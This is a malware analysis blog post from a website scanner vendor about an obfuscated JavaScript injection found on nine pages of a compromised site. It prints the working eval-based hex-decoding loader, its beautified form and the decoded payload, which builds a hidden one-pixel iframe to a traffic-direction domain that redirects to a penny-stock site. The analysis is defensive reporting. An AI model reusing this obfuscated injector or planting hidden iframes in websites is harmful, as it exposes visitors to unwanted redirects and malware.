Obfuscated malicious JavaScript code generated hidden iframe to drive traffic to customer website
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Usually, such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This website is located in Ukraine and it is used by Traffic Direction System (TDS) managed by malicious domain revmihyr[.]ru as referrer to 'penny stock' website. Malware scanner detected suspicious JavaScript code injected in 9 website pages. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. This post, in educational purposes, goes with the redirects to find the TDS 'customer'.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Wed May 8 10:51:43 2013
Infected website's files: 9
Quttera | Online Website Malware Scanner |
9 web pages detected containing malicious JavaScript |
Threat dump: [[<script type='text/javascript' language='javascript' >
e=eval;
v="0"+"x";
a=0;
try
{
a%26=2
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document["body"]^=~1;
}
catch(q)
{
a2="_"
}
z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_6b_76_6d_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_6b_76_6d_6d_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_6c_7d_74_70_6f_80_79_35_79_7c_36_6a_76_7c_75_7b_38_3f_35_77_6f_77_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_76_6d_6d_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_6b_76_6d_6d_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_76_6d_6d_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6b_76_6d_6d_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
s="";
for(i=0;
i<z.length;
i++)
{
s+=String["fromCharCode"](e(v+(z[i]))-5-2);
}
zaz=s;
e(zaz);
}
</script>]]
Malware entry
Malware entry details.
Beautified script
- e = eval;
- v = "0" + "x";
- a = 0;
- try {
- a &= 2
- } catch (q) {
- a = 1
- }
- if (!a) {
- try {
- document["body"] ^= ~1;
- } catch (q) {
- a2 = "_"
- }
- z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_6b_76_6d_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_6b_76_6d_6d_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_6c_7d_74_70_6f_80_79_35_79_7c_36_6a_76_7c_75_7b_38_3f_35_77_6f_77_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6b_76_6d_6d_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_76_6d_6d_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_6b_76_6d_6d_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_76_6d_6d_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6b_76_6d_6d_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
- s = "";
- for (i = 0; i < z.length; i++) {
- s += String["fromCharCode"](e(v + (z[i])) - 5 - 2);
- }
- zaz = s;
- e(zaz);
- }
Malicious payload
Decoded payload injects hidden iframe to http://revmihyr.ru/count18.php
At the time this article is being written the .php in payload contains the following redirection:
So in this case we can see that the customer of the TDS is actually some penny stock website that you don't want to visit.
The website is Suspicious on Google Safe Browsing.
- (function () {
- var doff = document.createElement('iframe');
- doff.src = 'http://revmihyr.ru/count18.php';
- doff.style.position = 'absolute';
- doff.style.border = '0';
- doff.style.height = '1px';
- doff.style.width = '1px';
- doff.style.left = '1px';
- doff.style.top = '1px';
- if (!document.getElementById('doff')) {
- document.write('<div id=\'doff\'></div>');
- document.getElementById('doff').appendChild(doff);
- }
- })();
At the time this article is being written the .php in payload contains the following redirection:
<!DOCTYPE HTML>
<html>
<head>
<script type="text/javascript">
parent.location.href = "http://www.thehotpennystocks.com/Stock-Quotes/?stock=GTRL";
</script>
</head>
<body>
</body>
</html>
So in this case we can see that the customer of the TDS is actually some penny stock website that you don't want to visit.
Blacklisting status
The website is Suspicious on Google Safe Browsing.
Google Safe Browsing analysis |
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment